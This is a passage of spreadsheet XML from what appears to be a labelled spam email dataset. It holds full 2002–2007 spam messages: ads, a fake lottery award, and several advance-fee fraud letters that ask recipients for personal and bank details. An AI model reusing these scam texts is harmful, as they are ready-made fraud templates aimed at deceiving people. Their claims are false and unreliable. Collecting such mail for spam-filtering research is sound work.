--------------103237257898946--</t>
  </si>
  <si>
    <t>http://www.terra.es http://www.terra.es http://www.terra.es http://inglesa.net http://tilw.net</t>
  </si>
  <si>
    <t>4426</t>
  </si>
  <si>
    <t>To: JM@NETNOTEINC.COM\nFrom: Great Offers &lt;greatoffers@sendgreatoffers.com&gt;\nDate: Wed, 18 Sep 2002 09:12:04 -0500</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 09:12:04 -0500</t>
  </si>
  <si>
    <t>Great Offers &lt;greatoffers@sendgreatoffers.com&gt;</t>
  </si>
  <si>
    <t>Introducing Chase Platinum for Students with a 0% Introductory APR</t>
  </si>
  <si>
    <t>chase You are receiving this mailing because you are a member of MyTotalEmail.com and subscribed as:JM@NETNOTEINC.COM To unsubscribe  Click Here ([URL]http://admanmail.com[/URL] or reply to this email with REMOVE in the subject line - you must also include the body of this message to be unsubscribed. Any correspondence about the products/services should be directed to the company in the ad. %EM%JM@NETNOTEINC.COM%/EM%</t>
  </si>
  <si>
    <t>http://admanmail.com</t>
  </si>
  <si>
    <t>4422</t>
  </si>
  <si>
    <t>To: "Inbox" &lt;0927@sprint.com&gt;\nFrom: "Anna" &lt;manaqxh@abptrade.com.br&gt;\nDate: Wed, 18 Sep 2002 07:49:52 +0200 (CEST)</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 07:49:52 +0200 (CEST)</t>
  </si>
  <si>
    <t>"Anna" &lt;manaqxh@abptrade.com.br&gt;</t>
  </si>
  <si>
    <t>"Inbox" &lt;0927@sprint.com&gt;</t>
  </si>
  <si>
    <t>English Well for you?</t>
  </si>
  <si>
    <t>Hallo,\n\n\nI found yours Email ID in Directoric.\nI have been from Russian and for a man like you have I been lookink.\n\n\n[URL]http://www.easygoingcompanion.com[/URL]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n.If you no want to hear from me again just reply and i no bother you again\n\n**</t>
  </si>
  <si>
    <t>http://www.easygoingcompanion.com</t>
  </si>
  <si>
    <t>4418</t>
  </si>
  <si>
    <t>To: &lt;pattidrews@hotmail.com&gt;, &lt;xx567661@anon.penet.fi&gt;\nFrom: blueeyez35@hotmail.com\nDate: Wed, 18 Sep 2002 03:39:16 -1600</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 03:39:16 -1600</t>
  </si>
  <si>
    <t>blueeyez35@hotmail.com</t>
  </si>
  <si>
    <t>&lt;pattidrews@hotmail.com&gt;, &lt;xx567661@anon.penet.fi&gt;</t>
  </si>
  <si>
    <t>Re: Super CHARGE your desktop or laptop today!     17639</t>
  </si>
  <si>
    <t>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   Take Control of Your Computer With This Top-of-the-Line Software!  +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++                                  Symantec SystemWorks 2002                            -=Professional Software Suite=- This Special Package Includes Six - Yes 6! - Feature-Packed Utilities ALL for 1 Special LOW Price of Only $29.99! This Software Will:  - Protect your computer from unwanted and hazardous viruses  - Help secure your private &amp; valuable information  - Allow you to transfer files and send e-mails safely  - Backup your ALL your data quick and easily  - Improve your PC's performance w/superior integral diagnostics!  - ***** You'll NEVER have to take your PC to the repair shop AGAIN! *****         That's SIX, yes, -6- Feature-Packed Utilities @ 1 Great Price!!!     A $300+ Combined Retail Value YOURS Only $29.99! (Limited Time Offer)                       &lt; Price Includes FREE Shipping! &gt;          Why SO Cheap you ask? You are buying ONLINE WHOLESALE,                   Direct from the Warehouse TO YOU!                                           ~~~ AND ~~~          FOR A LIMITED TIME BUY 2 OF ANY SOFTWARE &amp; GET 1 FREE!!!!                                  Don't fall prey to destructive viruses or programs!           Protect your computer and your valuable information and...           ...CLICK HERE TO ORDER NOW! -&gt; [URL]http://61.151.247.39[/URL]              OR cut &amp; paste the above link  ^^^^^^^^^^^^^^^^  in your browser's URL bar.           FOR MORE QUESTIONS, OR TO ORDER CALL US TOLL-FREE ANYTIME!                                                   1 - 8 0 0 - 8 6 1 - 1 4 8 1 We are strongly against sending unsolicited emails to those who do not wish to receive our special mailings. You have opted-in to one or more of our affiliate sites requesting to be notified of any special offers we may run from time to time. We also have attained the services of an independent 3rd party to overlook list management and removal services. The list CODE in which you are registered is marked at the bottom of this email. If you do not wish to receive further mailings,  Please click here -&gt; [URL]http://61.151.247.39[/URL] to be removed from the list.   Please accept our apologies if you have been sent this email in error. We honor all removal requests.  IAES (International Association of Email Security) Approved List. Serial # 9e45tYu2-ssI3USA</t>
  </si>
  <si>
    <t>http://61.151.247.39 http://61.151.247.39</t>
  </si>
  <si>
    <t>4424</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: werkenbijdeotto1@37.com\nDate: Wed, 18 Sep 2002 01:36:31 +0100</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 01:36:31 +0100</t>
  </si>
  <si>
    <t>werkenbijdeotto1@37.com</t>
  </si>
  <si>
    <t>[ILUG] AWARD NOTIFICATION</t>
  </si>
  <si>
    <t>WERKEN BIJ DE LOTTO,\n41132, NL-1007 DB AMSTERDAM,\nTHE NETHERLANDS.\n\n\nFROM: THE DESK OF THE DIRECTOR PROMOTIONS,\nINTERNATIONAL PROMOTIONS/PRIZE AWARD DEPARTMENT,\nREF: WBL/67-B773524441\n\nATTN:\n\n	AWARD NOTIFICATION; FINAL NOTICE\n\nWe are pleased to inform you of the announcement\ntoday, 17 th  SEPT.  2002, of \nwinners of the WERKEN BIJ DE LOTTO/ INTERNATIONAL\nPROGRAMS held on 5TH JulY 2002.\n\nYou / your company, attached to ticket number\n013-2316-2002-477, with serial \nnumber A025-09 drew the lucky numbers\n37-13-34-85-56-42, and consequently won in \ncategory C.\n\nYou have therefore been approved for a lump sum pay\nout of US$1,500,000.00 in \ncash credited to file REF NO. REF:\nWBL/67-B773524441. This is from total prize \nmoney of US$22,500,000.00 shared among the fifteen\ninternational winners in the \ncategory C. All participants were selected through a\ncomputer ballot system \ndrawn from 30,000 names from Australia, New Zealand,\nAmerica, Asia, Europe and \nNorth America as part our\nInternational Promotions Program, which is conducted\nannually.\n\nCONGRATULATIONS!\n\nYour fund is now deposited with a Finance and\nSecurity House and insured in \nyour name. Due to the mix up of some numbers and\nnames, we ask that you keep this \naward strictly from public notice until your claim\nhas been processed and your \nmoney remitted to your account. This is part of our\nsecurity protocol to avoid \ndouble claiming or unscrupulous acts by participants\nof this program.\n\nWe hope with a part of you prize, you will\nparticipate in our end of year high \nstakes US$1.3 billion International lotto.\n\nTo begin your claim, please contact your claims\nofficer immediately:\n\nJANSEN DAVIS\nFOREIGN SERVICE MANAGER,\nEUROLITE BV,\nTEL: 31 205241510    \nFAX: 31 205241590\nEMAIL:eurolitebv1@theoffice.net\n\nFor due processing and remittance of your prize\nmoney to a designated account \nof your choice. Remember, you must contact your\nclaims officer not later than \nSEPTEMBER 27 th, 2002. After this date, all funds\nwill be returned as unclaimed.\n\nNOTE: In order to avoid unnecessary delays and\ncomplications, please remember \nto quote your reference number in every one of your\ncorrespondences with your \nofficer. Furthermore, should there be any change of\nyour address, do inform your \nclaims officer as soon as possible.\n\nCongratulations again from all our staff and thank\nyou for being part of our \npromotions program.\n\n\nSincerely,\n\nTHE DIRECTOR PROMOTIONS,\nWERKEN BIJ DE LOTTO.\n[URL]www.werken-bij-delotto.net[/URL]\n\nN.B. Any breach of confidentiality on the part of\nthe winners will result to \ndisqualification. Please do not reply this mail.\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>www.werken-bij-delotto.net http://www.linux.ie</t>
  </si>
  <si>
    <t>4423</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "Femi Daniel" &lt;femidan@mail.com&gt;\nDate: Wed, 18 Sep 2002 01:11:54</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 01:11:54</t>
  </si>
  <si>
    <t>"Femi Daniel" &lt;femidan@mail.com&gt;</t>
  </si>
  <si>
    <t>[ILUG] HELLO</t>
  </si>
  <si>
    <t>OFFICE OF:EGNR. FEMI DANIEL\nFEDERAL MINISTRY OF WORKS AND HOUSING\nFEDERAL SECRETARIAT OFFICE COMPLEX\nIKOYI-LAGOS.\n\nATTN:,                  \n\nFirst, I must solicit your strictest confidence in this transaction, this is by virtue of its nature as being utterly confidential and top secret as you were introduced to me in confidence through the Nigeria Chamber of Commerce and Industries.\n\nWe are top officials from the Federal Ministry of Works and Housing,(FMW&amp;H), Federal Ministry of Finance and the Presidency, making up the Contract Review Panel(CRP) set up by the Federal Government of Nigeria to review contracts awarded by the past military administration. \n\nIn the course of our work on the CRP, we discovered this fund which resulted from grossly over - invoiced contracts which were executed for the FMW&amp;H during the last administration.The companies that executed the contracts have been duly paid and the contracts commissioned leaving the sum of US$21.4 Million floating in the escrow account of the Central Bank of Nigeria ready for payment.\n\nI have therefore  been mandated as a matter of trust by my colleagues in the panel to look for an overseas partner to whom we could transfer the sum of US21.4 legally subcontracting the entitlement to your company.This is bearing in mind that our civil service code of conduct forbids us from owning foreign companies or operating foreign accounts while in government service, hence the need for an overseas partner.\n\nWe have agreed that the funds will be shared thus after it has been paid into your account.\n(1) 30% of the money will go to you for acting as the beneficiary of the fund.\n(2) 10% has been set aside as an abstract projection for reimbursement to both parties for incidental expences that may be incurred in the course of the transaction.\n(3) 60% to us the government officials (with which we intend to commence an importation business in conjunction with you)\n\nAll logistics are in place and all modalities worked out for the smooth conclusion of the transaction within ten to fourteen days of commencement after receipt of the following information; your full names, company's name, address,details &amp; activities, telephone &amp; fax numbers.These information will enable us make the applications and lodge claims to the concerned ministries &amp; agencies in favour of your company and it is pertinent to state here that this transaction is entirely based on trust as the solar bank draft or certified cheque drawable in any of the Central Bank of Nigeria correspondent bankers around the world is going to be made in your name.\n\nPlease acknowledge the reciept of this letter using the above e-mail or the Alternative: femi1855@aol.com to reply me. \n\nYours faithfully,\n\nEgnr. Femi Daniel.\n\nNB:Bank Account Details not necessary as preferred mode of payment is by draft or cheque. \n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>4421</t>
  </si>
  <si>
    <t>To: &lt;social@linux.ie&gt;\nFrom: "Femi Daniel" &lt;femidan@mail.com&gt;\nDate: Wed, 18 Sep 2002 01:11:52</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 01:11:52</t>
  </si>
  <si>
    <t>[ILUG-Social] HELLO</t>
  </si>
  <si>
    <t>OFFICE OF:EGNR. FEMI DANIEL\nFEDERAL MINISTRY OF WORKS AND HOUSING\nFEDERAL SECRETARIAT OFFICE COMPLEX\nIKOYI-LAGOS.\n\nATTN:,                  \n\nFirst, I must solicit your strictest confidence in this transaction, this is by virtue of its nature as being utterly confidential and top secret as you were introduced to me in confidence through the Nigeria Chamber of Commerce and Industries.\n\nWe are top officials from the Federal Ministry of Works and Housing,(FMW&amp;H), Federal Ministry of Finance and the Presidency, making up the Contract Review Panel(CRP) set up by the Federal Government of Nigeria to review contracts awarded by the past military administration. \n\nIn the course of our work on the CRP, we discovered this fund which resulted from grossly over - invoiced contracts which were executed for the FMW&amp;H during the last administration.The companies that executed the contracts have been duly paid and the contracts commissioned leaving the sum of US$21.4 Million floating in the escrow account of the Central Bank of Nigeria ready for payment.\n\nI have therefore  been mandated as a matter of trust by my colleagues in the panel to look for an overseas partner to whom we could transfer the sum of US21.4 legally subcontracting the entitlement to your company.This is bearing in mind that our civil service code of conduct forbids us from owning foreign companies or operating foreign accounts while in government service, hence the need for an overseas partner.\n\nWe have agreed that the funds will be shared thus after it has been paid into your account.\n(1) 30% of the money will go to you for acting as the beneficiary of the fund.\n(2) 10% has been set aside as an abstract projection for reimbursement to both parties for incidental expences that may be incurred in the course of the transaction.\n(3) 60% to us the government officials (with which we intend to commence an importation business in conjunction with you)\n\nAll logistics are in place and all modalities worked out for the smooth conclusion of the transaction within ten to fourteen days of commencement after receipt of the following information; your full names, company's name, address,details &amp; activities, telephone &amp; fax numbers.These information will enable us make the applications and lodge claims to the concerned ministries &amp; agencies in favour of your company and it is pertinent to state here that this transaction is entirely based on trust as the solar bank draft or certified cheque drawable in any of the Central Bank of Nigeria correspondent bankers around the world is going to be made in your name.\n\nPlease acknowledge the reciept of this letter using the above e-mail or the Alternative: femi1855@aol.com to reply me. \n\nYours faithfully,\n\nEgnr. Femi Daniel.\n\nNB:Bank Account Details not necessary as preferred mode of payment is by draft or cheque. \n\n-- \nIrish Linux Users' Group Social Events: social@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>4420</t>
  </si>
  <si>
    <t>To: &lt;social@linux.ie&gt;\nFrom: elane_ling@hotmail.com\nDate: Wed, 18 Sep 0102 04:15:01 +0600</t>
  </si>
  <si>
    <t>Wed, 18 Sep 0102 04:15:01 +0600</t>
  </si>
  <si>
    <t>elane_ling@hotmail.com</t>
  </si>
  <si>
    <t>[ILUG-Social] Poker for money againts real players</t>
  </si>
  <si>
    <t>Get your favorite Poker action at [URL]http://www.multiplayerpoker.net[/URL]\n\nPlay against real people from around the world for real money or just\nfor fun.  Access one of the busiest poker rooms online.  We've dealt\nover 8 million hands!  Experience the best poker software available\ntoday featuring world class graphics, true random shuffling algorithms,\nand 24x7 customer service.  We've got a great selection of poker games\nfor you to play such as:\n\nHold'em, Omaha\nOmaha Hi/Lo\n7 Card Stud\n7 Card Stud Hi/Lo\n5 Card Stud\nPoker tournaments\n\nSign up today and start playing with new &amp; old friends...download our free\nsoftware now at [URL]http://www.MultiPlayerPoker.net[/URL]\n\nCurrent Promotion:\n   $50 Deposit Bonus! - 100% bonus!\n   Daily High Hand - $250 Daily.\n   Progressive Bad Beat Jackpot - $2,000.00 minimum with $100.00 added\ndaily.\n   Tournaments - Multiplayer shootouts.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nwish not to received any further e-mail from us please click\n[URL]http://www.centralremovalservice.com[/URL]\n(I3-SS3)\n-- \nIrish Linux Users' Group Social Events: social@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.multiplayerpoker.net http://www.MultiPlayerPoker.net http://www.centralremovalservice.com http://www.linux.ie</t>
  </si>
  <si>
    <t>2617</t>
  </si>
  <si>
    <t>To: joe_alex1bf@latinmail.com &lt;joe_alex1bf@latinmail.com&gt;\nFrom: joe alex &lt;joe_alex1bf@latinmail.com&gt;\nDate: Wed, 18 Oct 2006 20:32:02 +0200</t>
  </si>
  <si>
    <t>Wed, 18 Oct 2006 20:32:02 +0200</t>
  </si>
  <si>
    <t>joe alex &lt;joe_alex1bf@latinmail.com&gt;</t>
  </si>
  <si>
    <t>joe_alex1bf@latinmail.com &lt;joe_alex1bf@latinmail.com&gt;</t>
  </si>
  <si>
    <t>(I AM CAPT. JOE ALEX) PLEASE REPLY IMMEDIATELY</t>
  </si>
  <si>
    <t>FROM: CAPT. JOE ALEX.\nTELE 00226 78 02 21 52\nCENTRAL VILLE\nOUAGADOUGOU, BURKINA-FAS0\n\n\nDEAR SIR / MADAM\n\nSTRICTLY CONFIDENTIAL\n\nI AM SURE, THIS LETTER WILL BE A SURPRISE TO YOU, I AM CAPT. JOE ALEX. OF THE REPUBLIC OF LIBERIAN (WEST AFRICA) AND THE FORMER AIDE DE CAMP OF THE EX- PRESIDENT, CHARLES TAYLOR, OF THE REPUBLIC OF LIBERIA. I GOT YOUR ADDRESS THROUGH INTERNET SEARCH HERE IN OUAGADOUGOU, BURKINA FASO ALTHOUGH I DID NOT KNOW YOU BEFORE BUT GOD HAS DIRECTED ME TO CONTACT YOU THAT YOU WILL BE CAPABLE OF HANDLING THIS TRANSACTION SUCCESFULLY WITHOUT HITCH.\n\nTHE THE EX- PRESIDENT, CHARLES TAYLOR, SUCCESSFULLY TOPPLED THE FORMER PRESIDENT OF MY COUNTRY, THE LATE SAMUEL DOE AND RULED PEACEFULLY FOR FEW YEARS. HOW EVER, FOUR (4) YEARS AGO, THE REBELS FROM THE NORTHERN PART OF MY COUNTRY REBELLED AGAINST THE GOVERNMENT. EVER SINCE THEN, MY COUNTRY HAS BEEN AT WAR.\n\nDUE TO THIS WAR, PUBLIC FUNDS AND PROPERTIES HAVE BEEN CONSTANTLY LOOTED AND STOLEN BY THE REBEL SOLDIERS AND GOVERNMENT FUNCTIONARIES. HOWEVER, WHEN THE REBEL ATTACK BECAME SO SERIOUS, L WAS ASSIGNED BY THE PRESIDENT ON BEHALF OF HIS CABINET THREE YEARS AGO TO PURCHASE AMMUNITION WORTH OF U.S. $ 11 MILLION (ELEVEN MILLION UNITED STATES DOLLARS) FROM BURKINA FASO, WHILE WE WERE STILL NEGOTIATING FOR THE ARMS DEAL IN BURKINA FASO , WE HEARD OVER THE NEWS THAT THE REBELS HAS INVADED THE CAPITAL CITY, MONROVIA AND THE PRESIDENT CHARLES TAYLOR, HAS BEEN GIVEN AUTOMATON TO RELINQUISH POWER, WHICH TOOK PLACE ON THE 11TH DAY OF AUGUST 2003, SO WE SAW THIS AS A GOLDEN OPPORTUNITY TO DIVERT THE FUND FOR OUR OWN INTEREST , COUPLED WITH THE NEWS WE HEARD ABOUT AMERICAN AND ECOWAS TROOPS SENT TO MONROVIA FOR PEACE KEEPING.\n\nFURTHERMORE, WE DEPOSITED THE FUND WITH THE SECURITY AND FINANCE HOUSE, HERE IN OUAGADOUG, BURKINA FASO. I AM PRESENTLY LIVING IN BURKINA FASO ON ASYLUM. THE FINANCIAL LAW OF BURKINA FASO DOES NOT ALLOW ASYLUM ANY FINANCIAL RIGHTS. IN VIEW OF THIS, COUPLED WITH THE WAY IN WHICH THE MONEY WAS ACQUIRED, I DECIDED NOT TO INVEST THIS MONEY ANYWHERE IN BURKINA FASO OR THE WESTERN AFRICAN CONTINENT AS A WHOLE. FOR YOUR EFFORTS, I AM PREPARED TO OFFER YOU 30% OF THE TOTAL SUM IF YOU WILL ASSIST ME TO TRANSFER THIS MONEY INTO YOUR ACCOUNT OVERSEAS, 5% HAVE ALSO BEEN MAPPED OUT FOR EXPENSES THAT MIGHT BE INCURRED IN THE PROCESS OF THIS TRANSACTION, AND REMAINING 65% WILL BE FOR I AND MY FAMILY WHICH WE INTEND INVESTING IN YOUR COUNTRY OR ANY WHERE YOU MAY DEEM FIT.\n\nFROM THE ABOVE, YOU WILL UNDERSTAND THAT MY ENTIRE LIFE AND OUR FUTURE AND THAT OF OUR FAMILIES DEPENDS ON THIS MONEY, AS SUCH I WILL VERY MUCH APPRECIATE IF YOU CAN ASSIST US. PLEASE NOTE THAT THIS TRANSACTION IS RISK FREE. THE MAJOR THING I REQUEST FROM YOU IS ABSOLUTE ASSURANCE THAT THIS MONEY WILL BE SAFE WHEN TRANSFERRED TO YOUR ACCOUNT. IF YOU CAN BE OF ASSISTANCE, KINDLY CONTACT ME ON THE ABOVE TELEPHONE NUMBER. EVEN IF YOU HAVE DECIDED OTHERWISE, I WILL BE MOST GRATEFUL IF YOU MAINTAIN THE CONFIDENTIALITY OF THIS MATTER. I AM LOOKING FORWARD TO YOUR URGENT REPLY.\nYOURS SINCERELY,\n\nCAPT. JOE ALEX\n\n(FOR THE FAMILY)\nPLEASE REPLY ME THROUGH THIS MAIL BOX (J_ALEX1BF@LATINMAIL.COM)\n\n¡Miles de amigos con tus mismas aficiones! [URL]http://www.latinchat.com[/URL]</t>
  </si>
  <si>
    <t>2615</t>
  </si>
  <si>
    <t>To: nan\nFrom: Mr.Adnan A.K.Ismail &lt;a_dnanaki@yahoo.com&gt;\nDate: Wed, 18 Oct 2006 17:42:20 +0400</t>
  </si>
  <si>
    <t>Wed, 18 Oct 2006 17:42:20 +0400</t>
  </si>
  <si>
    <t>Mr.Adnan A.K.Ismail &lt;a_dnanaki@yahoo.com&gt;</t>
  </si>
  <si>
    <t>URGENT REPLY</t>
  </si>
  <si>
    <t>\n&gt;From Mr.Adnan A.K.Ismail.\nManager National Bank of Dubai Abu Dhabi\nbranch Dubai United Arab Emirate (U.A.E.)\nEmail: a_dnanak_i@yahoo.com\n\nI am Mr.Adnan A.K.Ismail Branch Manager National Bank of Dubai Abu \nDhabi branch, I have urgent and very confidential business proposition for \nyou.A British Oil consultant and contractor with the Kruger Gold \nCompany,Mr. Raymond Beck made a numbered time (Fixed) Deposit for twelve calendar months in my branch. Upon maturity,I sent a routine notification to his forwarding address but got no reply.\n\nAfter a month, we sent a reminder and finally we discovered from his \ncontract employers, the Kruger Gold Company that Mr. Raymond Beck died in a plane crash along with his wife Mr. and Mrs. Raymond Beck died in a plan crash along with his wife in Egypt Air Flight 990, 1999 air crash \n(for more information about this crash and person you can contact this \nwebsite\n\n[URL]http://news.bbc.co.uk[/URL]\nSince we got this information about his death and on further \ninvestigation,I found out that he died without making a WILL, and all attempts to trace his next of kin was fruitless.I therefore made further \ninvestigationand discovered that Mr. Raymond Beck did not declare any kin or relations in all his official documents, including his Bank Deposit \npaperwork in my Bank.\n\n This money is still sitting in my Bank and the interest is being rolled over with the principal sum at the end of each year.No one will ever come forward to claim it. According to Laws of United Arab Emirates, at the expiration of 7 (seven) years, the money will revert to the ownership of the (U.A.E) Government if nobody applies to claim the fund. Consequently, my proposal is that I will like you as a foreigner to \nstand in as the next of kin to Mr. Raymond Beck so that the fruits of this \n\nold man's labor will not get into the hands of some corrupt government \nofficials.This is simple, I will like you to provide immediately your \nfull names and address so that the attorney will prepare the necessary \ndocuments and affidavits that will put you in place as the next of kin.\nWe shall employ the services of an attorney for drafting and notarization of the WILL and to obtain the necessary documents and letter of \n\nprobate/administration in your favor for the transfer. A bank account in \nany part of the world that you will provide will then facilitate the transfer of this money to you as the beneficiary/next of kin.\n\nThe money will be paid into your account for us to share in the ratio of 60% for me and 40% for you.There is no risk at all as all the paperwork for this transaction will be done by the attorney and my position as the Branch Manager guarantees the successful execution of this transaction.If you are interested, \n  \nPlease reply immediately via the private email address above.Upon your response, I shall then provide you with more details and relevant documents that will help you understand the transaction. Please send me your confidential telephone and fax numbers for easy communication.\n\nPlease observe utmost confidentiality, and rest assured that this transaction would be most profitable for both of us because I shall require your assistance to invest my share in your country.\n\nPlease reply through my private email address: a_dnanak_i@yahoo.com\nAwaiting your urgent reply\nRegards.\nMr.Adnan A.K.Ismail \n\n\n\n\n</t>
  </si>
  <si>
    <t>1306</t>
  </si>
  <si>
    <t>To: johnpeters2002@eresmas.com\nFrom: John Peters John &lt;johnpeters2002@eresmas.com&gt;\nDate: Wed, 18 May 2005 14:23:27 +0000</t>
  </si>
  <si>
    <t>Wed, 18 May 2005 14:23:27 +0000</t>
  </si>
  <si>
    <t>John Peters John &lt;johnpeters2002@eresmas.com&gt;</t>
  </si>
  <si>
    <t>johnpeters2002@eresmas.com</t>
  </si>
  <si>
    <t>INVESTMENT  PROPOSAL</t>
  </si>
  <si>
    <t>Dear sir,  I am Mr John Peters Trieste, an international business consultant, market and commodity Broker,an import-export consultant in West African region. One of my client is interested in investing Millions of Dollars in your country and he is interested in investing with your company . kindly forward all your company's profile to me for immediate decision on the investment programme . Total amount to be invested=$75,000,000,00.usd...Cash investment4Metric tons of AU in dust....Treasure investmentPrecious stones, quantity not declared......Treasure investmentOrigin:Accra Ghana Immediately I receive your detailed information, I will inform him about your willinness to champion the project effectively and feed you with his arrangements on how the said fund could reach you. Anticipating your immediate reply. Best regardsJohn Peters Trieste  -----------------------------------------------------------------------INGRESOS EXTRAS. Gana hasta 9.000€ trabajando desde casa a tiempo parcial.[URL]http://ad.doubleclick.net[/URL];16191576;7829128;u?[URL]http://www.trabajaportucuenta.com[/URL]</t>
  </si>
  <si>
    <t>http://ad.doubleclick.net http://www.trabajaportucuenta.com</t>
  </si>
  <si>
    <t>1305</t>
  </si>
  <si>
    <t>To: bzulu64@hotmail.com\nFrom: BONGIES ZULU &lt;bzulu64@hotmail.com&gt;\nDate: Wed, 18 May 2005 13:25:10 +0200</t>
  </si>
  <si>
    <t>Wed, 18 May 2005 13:25:10 +0200</t>
  </si>
  <si>
    <t>BONGIES ZULU &lt;bzulu64@hotmail.com&gt;</t>
  </si>
  <si>
    <t>bzulu64@hotmail.com</t>
  </si>
  <si>
    <t>why i contacted you sir!</t>
  </si>
  <si>
    <t>BONGIES ZULU\nTEL; +27-76-223-9702\nE-mail: bzulu64@hotmail.com\n\nDear Sir/Madam,\n\nI am BONGIES ZULU from Cape Town, South Africa and I am an Executive\nAccountant with the South Africa Department of Mining &amp; Natural Resources\naffiliated (created) to the Department of Minerals and Energy. First and\nforemost, I apologized using this medium to reach you for a\ntransaction/business of this magnitude, but this is due to Confidentiality\nand prompt access reposed on this medium.\n\nBe informed that a member of the South African Export Promotion Council\n(SEPC) who was at the Government delegation to your country during a trade\nexhibition gave your enviable credentials/particulars to me. I plea to seek\na confidential co-operation with you in the execution of the deal described\nHereunder for the benefit of all parties and hope you will keep it as a top\nsecret because of the nature of this transaction.\n\nWithin the Department of Mining &amp; Natural Resources where I work as an\nExecutive Accountant and with the cooperation of two other top officials, we\nhave in our possession as overdue payment bills totaling TEN MILLION FIVE\nHUNDRED THOUSAND US DOLLAR, (10.5) which we want to transfer abroad with the\nassistance and cooperation of a foreign company/individual to receive the\nsaid fund on our behalf or a reliable foreign non-company account to receive\nsuch funds. More so, we are handicapped in the circumstances, as the South\nAfrica Civil Service Code of Conduct does not allow us to operate offshore\naccount hence your importance in the whole transaction.\n\nThis amount TEN MILLION FIVE HUNDRED THOUSAND UNITED STATES DOLLAR ($10.5m)\nrepresents the balance of the total contract value executed on behalf of my\nDepartment by a foreign contracting firm, which we the officials\nover-invoiced deliberately. Though the actual contract cost have been paid\nto the original contractor, leaving the balance in the tune of the said\namount which we have in principles gotten approval to remit by Telegraphic\nTransfer (T.T) to any foreign bank account you will provide by filing in an\napplication through the Justice Ministry here in South Africa for the\ntransfer of rights and privileges of the former contractor to you.\n\nI have the authority of my partners involved to propose that, should you be\nwilling to assist us in this transaction that is 100% hitch free, your share\nof the sum will be 25% of the $10.5 million, 70% for us and 5% for taxation\nand miscellaneous expenses. The business itself is 100% safe, on your part\nprovided you treat it with utmost secrecy and confidentiality. Also your\narea of specialization is not a hindrance to the successful execution of\nthis transaction. I have reposed my confidence in you and hope that you will\nnot disappoint me.\n\nEndeavor to contact me through above e-mail address or the fax number\nwhether or not you are interested in this deal. If you are not, it will\nenable me scout for another foreign partner to carry out this deal I want to\nassure you that my partners and myself are in a position to make the payment\nof this claim possible provided you can give us a very strong Assurance and\nguarantee that our share will be secured. And please remember to treat this\nas very confidential because, we will not comprehend with any form of\nexposure as we are still in active Government Service and remember once\nagain that, time is of the essence in this business.\n\nI wait in anticipation of your fullest co-operation.\n\nYours faithfully,\n\nBONGIES ZULU\n\n_________________________________________________________________\nGet news headlines and download FREE stuff - visit MSN South Africa! \n[URL]http://www.msn.co.za[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>3211</t>
  </si>
  <si>
    <t>To: nan\nFrom: gerald zongo &lt;geraldzongo_38@hotmail.fr&gt;\nDate: Wed, 18 Jul 2007 20:12:08 +0200</t>
  </si>
  <si>
    <t>Wed, 18 Jul 2007 20:12:08 +0200</t>
  </si>
  <si>
    <t>gerald zongo &lt;geraldzongo_38@hotmail.fr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Your kind attention needed. </t>
  </si>
  <si>
    <t>\nHello Dear,This mail might come to you as a surprise and the temptation to ignore it as unserious could come into your mind but please consider it a divine wish and accept it with a deep sense of humility.I am Mr. Gerald Zongo, the manager in charge of Auditing department of Bank of Africa (B.O.A) Ouagadougou Burkina Faso in West Africa, with due respect and Regard; I have decided to contact you on a business transaction that will be very beneficial to both of us at the end of the transaction.During our investigation and auditing in this Bank, my department came across a very huge sum of money belonging to one of our deceased customer who died on Feb 29th 2002 of a ghastly motor accident and the fund has been dormant in his account with this bank without any claim of the fund in our Custody either from his family or relation before our discovery to this development. Although personally,I keep this information secret to enable the whole plans and idea be Profitable and successful during the time of execution, the said amount is Twelve million four hundred thousand United States dollars(US$12.4m), as it may interest you to know, I contacted you to be my partner and person to be reliable and capable to champion a business of such magnitude without any problem.Meanwhile all the arrangement to put claim over this fund as the next of kin to the deceased, get the required approval and transfer this money to a foreign account has been put in Place and directives and needed information will be relayed to you as soon as you indicate your interest and willingness to assist me and also benefit your self to this great business opportunity, In fact I could have done this deal alone but because of my position in this country as a civil servant and we are not allowed to operate a foreign account and would eventually raise eye brow on my side during the time of transfer because I work in this bank.I will not fail to inform you that this transaction is 100% risk free, on smooth conclusion of this transaction, you will be entitled to 30% of the total sum as gratification, while 5% will be set aside to take care of expenses that may arise during the time of transfer, while 65% will be for me, please you have been advised to keep "Top Secret" as I am still in service and intend to retire from service after we conclude this deal with you.I will be monitoring the whole situation here in this bank Until you confirm the money in your account, and ask us to come down to your country for subsequent sharing of the fund according to percentages previously indicated and further Investment, either in your country or any country you advice us to invest in and all other necessary vital information will be send to you when I hear from you.I suggest you get back to me As soon as possible and also include your personal phone/mobile and fax numbers for easy communication.Yours faithfully,Mr. Gerald ZongoThe manager in charge ofAuditing department ofBank of Africa (B.O.A)Ouagadougou Burkina Faso.\n_________________________________________________________________\nPlay free games, earn tickets, get cool prizes! Join Live Search Club. \n[URL]http://club.live.com[/URL]</t>
  </si>
  <si>
